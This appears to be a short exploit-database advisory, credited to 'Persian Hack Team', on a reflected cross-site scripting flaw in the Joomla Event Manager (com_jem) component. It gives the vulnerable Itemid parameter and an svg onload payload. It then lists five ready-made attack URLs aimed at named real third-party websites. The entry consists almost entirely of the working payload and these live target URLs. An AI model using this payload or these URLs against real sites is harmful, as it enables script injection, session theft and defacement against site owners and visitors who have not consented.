######################
# Exploit Title :  Joomla Event Manager (com_jem) - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://www.joomlaeventmanager.net/download
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 2.x
# Date: 2016/05/11
######################
#
# PoC:
# itemid=[XSS]
# Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
# https://www.msuhillel.org/index.php?option=com_jem&view=eventslist&Itemid=293%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&limitstart=10
# http://fineartbazar.ir/portal/index.php?option=com_jem&view=venue&id=22:2015-01-05-09-15-50&Itemid=465%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.prestodigitators.com/index.php?view=eventslist&task=archive&option=com_jem&Itemid=562%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.degrootdiervoeders.nl/index.php?option=com_jem&view=eventslist&Itemid=145%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.kuhlo-realschule.de/index.php?option=com_jem&view=eventslist&task=archive&Itemid=72%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : Milad Hacking & FireKernel And All Persian Hack Team Members
# Homepage : persian-team.ir
######################